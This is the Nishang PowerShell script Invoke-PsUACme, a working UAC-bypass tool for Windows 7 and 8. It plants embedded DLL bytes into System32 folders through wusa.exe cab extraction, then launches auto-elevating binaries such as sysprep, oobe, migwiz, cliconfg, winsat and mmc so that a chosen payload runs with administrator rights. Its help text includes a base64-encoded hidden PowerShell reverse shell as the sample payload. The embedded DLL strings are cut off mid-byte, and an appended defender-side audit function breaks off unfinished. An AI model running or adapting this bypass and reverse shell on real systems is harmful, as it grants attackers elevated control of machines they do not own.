418 lines
50 KiB
PowerShell
function Invoke-PsUACme
{
<#
.SYNOPSIS
Nishang script which uses known methods to bypass UAC.

.DESCRIPTION
This script implements methods from the UACME project (https://github.com/hfiref0x/UACME) to bypass UAC on Windows machines.
It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wusa.exe and executes built-in executables
to bypass UAC. The following methods (named mostly on the basis of the executables used) are implemented: "sysprep", "oobe", "ActionQueue",
"migwiz", "cliconfg", "winsat" and "mmc".

The DLL dropped by the script is a modified version of Fubuki from the UACME project. Separate DLLs are needed for 64 bit and 32 bit machines.
The script determines the bit-ness of the process from which it is called and uses the appropriate DLL.

The script drops cmd.bat in the C:\Windows\Temp directory and it is this batch file which is called from the DLL. Everything provided
to the Payload parameter ends up in this batch file.

Wusa.exe on Windows 10 has no "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently.
A clean up is done by the script after payload execution, but the DLLs dropped in secure locations must be removed manually.
The script must be run from a process running with medium integrity.

.PARAMETER Payload
Payload to be executed from the elevated process. The default one checks whether the elevation was successful.

.PARAMETER method
The method to be used for elevation. The default one is sysprep.

.PARAMETER PayloadPath
The path to the payload. The default one is C:\Windows\temp\cmd.bat. To change this, change the path in the DLL as well.

.PARAMETER CustomDLL64
Path to a custom 64 bit DLL.

.PARAMETER CustomDLL32
Path to a custom 32 bit DLL.

.PARAMETER DllBytes64
Default 64 bit DLL hard coded in the script. It is a slightly modified Fubuki DLL from the UACME project.

.PARAMETER DllBytes32
Default 32 bit DLL hard coded in the script. It is a slightly modified Fubuki DLL from the UACME project.

.EXAMPLE
PS > Invoke-PsUACme -Verbose
The above command runs the sysprep method and the default payload.

.EXAMPLE
PS > Invoke-PsUACme -method oobe -Verbose
The above command runs the oobe method and the default payload.

.EXAMPLE
PS > Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA=="
The above command runs the oobe method and the specified payload. The payload in this case is the one-liner PowerShell reverse shell
(Shells directory of Nishang) which is base64 encoded using the Invoke-Encode script (with the -OutCommand parameter) from the
Utility directory of Nishang.

The reverse shell in the above case runs with elevated privileges.

.LINK
http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html
https://github.com/samratashok/nishang
#>

    [CmdletBinding()] Param(

        [Parameter(Position = 0, Mandatory = $False)]
        [String]
        $Payload = 'powershell.exe -noexit -c "if ([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match ''S-1-5-32-544'')) {Write-Output ''You have elevated/Administrator rights!''}"',

        [Parameter(Position = 1, Mandatory = $False)]
        [ValidateSet("sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc")]
        [String]
        $method = "sysprep",

        [Parameter(Position = 2, Mandatory = $False)]
        [String]
        $PayloadPath = "C:\Windows\temp\cmd.bat",

        [Parameter(Position = 3, Mandatory = $False)]
        [String]
        $CustomDll64,

        [Parameter(Position = 4, Mandatory = $False)]
        [String]
        $CustomDll32,

        [Parameter(Position = 5, Mandatory = $False)]
        [String]
$DllBytes64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 114 7 185 113 19 105 234 113 19 105 234 113 19 105 234 172 236 162 234 116 19 105 234 113 19 104 234 124 19 105 234 131 74 97 235 123 19 105 234 131 74 105 235 112 19 105 234 131 74 150 234 112 19 105 234 113 19 254 234 112 19 105 234 131 74 107 235 112 19 105 234 82 105 99 104 113 19 105 234 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 4 0 250 130 9 86 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 4 0 0 0 16 0 0 0 0 0 0 168 17 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 6 0 0 0 6 0 0 0 0 0 0 0 0 80 0 0 0 4 0 0 19 147 0 0 2 0 96 1 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 176 34 0 0 148 3 0 0 68 38 0 0 60 0 0 0 0 64 0 0 224 4 0 0 0 48 0 0 24 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 33 0 0 56 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 120 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 52 3 0 0 0 16 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 242 7 0 0 0 32 0 0 0 8 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 112 100 97 116 97 0 0 24 0 0 0 0 48 0 0 0 2 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 4 0 0 0 64 0 0 0 6 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 194 0 0 204 72 137 92 36 24 85 86 87 72 141 108 36 185 72 129 236 224 0 0 0 51 246 72 141 69 111 72 33 117 111 72 141 21 87 16 0 0 33 117 103 65 185 25 0 2 0 69 51 192 72 137 68 36 32 72 199 193 1 0 0 128 255 21 193 15 0 0 133 192 15 133 67 1 0 0 72 139 77 111 72 133 201 15 132 54 1 0 0 72 141 69 103 69 51 201 72 137 68 36 40 72 141 21 49 16 0 0 72 33 116 36 32 69 51 192 255 21 147 15 0 0 133 192 15 133 13 1 0 0 139 125 103 255 199 255 21 208 15 0 0 68 139 199 141 86 8 72 139 200 255 21 137 15 0 0 72 139 216 72 133 192 15 132 231 0 0 0 72 139 77 111 72 141 69 103 72 137 68 36 40 72 141 21 225 15 0 0 69 51 201 72 137 92 36 32 69 51 192 255 21 64 15 0 0 133 192 15 133 136 0 0 0 72 141 13 217 15 0 0 255 21 99 15 0 0 72 139 203 255 21 90 15 0 0 141 86 104 51 192 139 202 72 141 125 215 243 170 72 141 125 183 137 85 215 141 78 24 243 170 72 141 77 215 255 21 87 15 0 0 72 141 69 183 69 51 201 72 137 68 36 72 69 51 192 72 141 69 215 72 139 211 72 137 68 36 64 51 201 72 33 116 36 56 72 33 116 36 48 33 116 36 40 33 116 36 32 255 21 250 14 0 0 139 240 133 192 116 20 72 139 77 183 255 21 226 14 0 0 72 139 77 191 255 21 216 14 0 0 255 21 250 14 0 0 76 139 195 51 210 72 139 200 255 21 228 14 0 0 72 139 77 111 255 21 154 14 0 0 72 141 21 251 14 0 0 72 199 193 1 0 0 128 255 21 110 14 0 0 139 198 72 139 156 36 16 1 0 0 72 129 196 224 0 0 0 95 94 93 195 204 72 137 92 36 8 72 137 124 36 16 85 72 141 172 36 0 250 255 255 72 129 236 0 7 0 0 184 1 0 0 0 59 208 15 133 80 1 0 0 72 141 13 10 15 0 0 255 21 108 14 0 0 232 35 254 255 255 51 219 133 192 15 133 43 1 0 0 141 83 104 139 202 72 141 
124 36 112 243 170 72 141 124 36 80 137 84 36 112 141 75 24 243 170 72 141 76 36 112 255 2

        [Parameter(Position = 6, Mandatory = $False)]
        [String]
$DllBytes32 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 114 7 185 113 19 105 234 113 19 105 234 113 19 105 234 172 236 162 234 116 19 105 234 113 19 104 234 124 19 105 234 131 74 97 235 123 19 105 234 131 74 105 235 112 19 105 234 131 74 150 234 112 19 105 234 113 19 254 234 112 19 105 234 131 74 107 235 112 19 105 234 82 105 99 104 113 19 105 234 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 4 0 4 49 10 86 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 4 0 0 0 16 0 0 0 0 0 0 46 17 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 6 0 0 0 6 0 0 0 0 0 0 0 0 80 0 0 0 4 0 0 162 232 0 0 2 0 64 5 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 80 33 0 0 148 3 0 0 192 37 0 0 60 0 0 0 0 48 0 0 224 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 60 0 0 0 16 33 0 0 56 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 137 2 0 0 0 16 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 50 7 0 0 0 32 0 0 0 8 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 4 0 0 0 48 0 0 0 6 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 60 0 0 0 0 64 0 0 0 2 0 0 0 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 195 85 139 236 131 236 92 83 87 141 69 252 51 219 80 104 25 0 2 0 83 104 64 32 0 16 104 1 0 0 128 139 251 137 93 252 137 93 248 255 21 4 32 0 16 133 192 15 133 241 0 0 0 57 93 252 15 132 232 0 0 0 86 139 53 8 32 0 16 141 69 248 80 83 83 83 104 96 32 0 16 255 117 252 255 214 133 192 15 133 199 0 0 0 139 69 248 64 80 106 8 255 21 48 32 0 16 80 255 21 20 32 0 16 139 216 133 219 15 132 169 0 0 0 141 69 248 80 83 87 87 104 96 32 0 16 255 117 252 255 214 133 192 117 107 139 53 36 32 0 16 104 120 32 0 16 255 214 83 255 214 106 68 90 139 202 141 69 164 198 0 0 64 131 233 1 117 247 106 16 89 141 69 232 198 0 0 64 131 233 1 117 247 141 69 164 137 85 164 80 255 21 52 32 0 16 141 69 232 80 141 69 164 80 51 192 80 80 80 80 80 80 83 80 255 21 32 32 0 16 139 248 133 255 116 16 255 117 232 139 53 28 32 0 16 255 214 255 117 236 255 214 83 106 0 255 21 48 32 0 16 80 255 21 44 32 0 16 255 117 252 255 21 12 32 0 16 104 64 32 0 16 104 1 0 0 128 255 21 0 32 0 16 94 139 199 95 91 139 229 93 195 85 139 236 129 236 112 6 0 0 51 192 64 83 86 57 69 12 15 133 60 1 0 0 104 160 32 0 16 255 21 36 32 0 16 232 172 254 255 255 51 219 133 192 15 133 27 1 0 0 106 68 90 139 202 141 69 172 136 24 64 131 233 1 117 248 106 16 89 141 69 240 136 24 64 131 233 1 117 248 141 69 172 137 85 172 80 255 21 52 32 0 16 185 10 2 0 0 141 133 160 253 255 255 136 24 64 131 233 1 117 248 190 4 1 0 0 141 133 160 253 255 255 86 80 104 212 32 0 16 255 21 40 32 0 16 133 192 15 132 189 0 0 0 59 198 15 131 181 0 0 0 185 16 4 0 0 141 133 144 249 255 255 136 24 64 131 233 1 117 248 102 139 133 160 253 255 255 141 141 144 249 255 255 102 
133 192 116 30 15 183 240 141 149 160 253 255 255 139 193 43 208 102 137 49 131 193 2 1
    )

    # A custom DLL, when given, replaces the hard coded byte string for that bit-ness.
    if ($CustomDll64)
    {
        Write-Output "Reading 64 bit DLL."
        [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll64)
        $DllBytes64 = $bytes -join ' '
    }
    elseif ($CustomDll32)
    {
        Write-Output "Reading 32 bit DLL."
        [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll32)
        $DllBytes32 = $bytes -join ' '
    }

    # Pointer size gives the bit-ness of the calling PowerShell process.
    if (([IntPtr]::Size) -eq 8)
    {
        Write-Output "64 bit process detected."
        $DllBytes = $DllBytes64
    }
    elseif (([IntPtr]::Size) -eq 4)
    {
        Write-Output "32 bit process detected."
        $DllBytes = $DllBytes32
    }

    # The payload goes into the batch file that the dropped DLL runs.
    Out-File -FilePath $PayloadPath -InputObject $Payload -Encoding ascii
    # The build number selects the DLL name each target executable loads:
    # "76" matches the Windows 7 builds 7600/7601, "96" matches build 9600, "10" matches Windows 10 builds.
    $OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber
    switch($method)
    {
        "Sysprep"
        {
            Write-Output "Using Sysprep method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "CRYPTBASE.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "shcore.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\Sysprep\"
            $execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            # wusa.exe auto-elevates, so the extraction lands in a directory the medium integrity process cannot write to.
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }

        "OOBE"
        {
            Write-Output "Using OOBE method"
            Write-Output "Writing DLLs to Temp directory"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "wdscore.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "wdscore.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\oobe\"
            $execpath = "C:\Windows\System32\oobe\setupsqm.exe"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }

        "ActionQueue"
        {
            Write-Output "Using Sysprep Actionqueue method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "ActionQueue.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "96")
            {
                Write-Warning "This method doesn't work from Windows 8.1 onwards."
            }

            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\Sysprep\"
            $execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }

        "migwiz"
        {
            Write-Output "Using migwiz method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "wdscore.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "wdscore.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\migwiz\"
            $execpath = "C:\Windows\System32\migwiz\migwiz.exe"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }

        "cliconfg"
        {
            Write-Output "Using cliconfg method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "ntwdblib.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "ntwdblib.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\"
            $execpath = "C:\Windows\System32\cliconfg.exe"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }

        "winsat"
        {
            Write-Output "Using winsat method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "ntwdblib.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "devobj.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\sysprep\"
            $execpath = "C:\Windows\System32\sysprep\winsat.exe"
            $Targetwinsat = "$env:temp\uac_winsat.cab"
            # This method needs a copy of winsat.exe next to the planted DLL, so two cabs are extracted.
            Write-Output "Copying C:\Windows\System32\winsat.exe to $env:temp"
            Copy-Item "C:\Windows\System32\winsat.exe" "$env:temp\winsat.exe"
            Write-Output "Creating cab $Targetwinsat"
            $null = & makecab "$env:temp\winsat.exe" $Targetwinsat
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Targetwinsat /extract:$wusapath
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }

        "mmc"
        {
            Write-Output "Using mmc method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "ntwdblib.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "elsext.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }

            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\"
            $execpath = "C:\Windows\System32\mmc.exe eventvwr.msc"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }
    }

    # Clean up: the staging cab and the temp copy of the DLL are removed; the DLL
    # extracted into the protected directory and the payload batch file are left behind.
    Write-Output "Removing $Target."
    Remove-Item -Path $Target
    Write-Output "Removing $PathToDll."
    Remove-Item -Path $PathToDll
    Write-Output "$wusapath$dllname must be removed manually."
    Write-Output "$PayloadPath must be removed manually."
}
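The following is an added example, not part of Nishang or of the script above: a defender-side audit that walks the drop directories and DLL names listed in the switch cases, checks the Authenticode signature of anything found there, looks for the staging files the script leaves in %temp% and C:\Windows\Temp, and reads the UAC prompt level that decides whether wusa.exe auto-elevates at all. The function name, output fields and sample invocation are my own; it assumes a standard %SystemRoot% layout.

```powershell
# Added example (not part of Nishang): audit the locations Invoke-PsUACme writes to.
function Find-PsUACmeArtifacts {
    [CmdletBinding()]
    param(
        [string]$SystemRoot = $env:SystemRoot,   # normally C:\Windows
        [string]$TempDir    = $env:TEMP          # %temp% of the account that ran the bypass
    )

    $sys32 = Join-Path $SystemRoot 'System32'
    # Directory -> file names the script plants there (collected from its switch cases).
    $planted = @{}
    $planted[(Join-Path $sys32 'Sysprep')] = @('CRYPTBASE.dll','shcore.dll','ActionQueue.dll','ntwdblib.dll','devobj.dll','winsat.exe')
    $planted[(Join-Path $sys32 'oobe')]    = @('wdscore.dll')
    $planted[(Join-Path $sys32 'migwiz')]  = @('wdscore.dll')
    $planted[$sys32]                       = @('ntwdblib.dll','elsext.dll')
    # Staging files: the payload batch file, the cabs fed to wusa and the copied winsat.exe.
    $staged = @(
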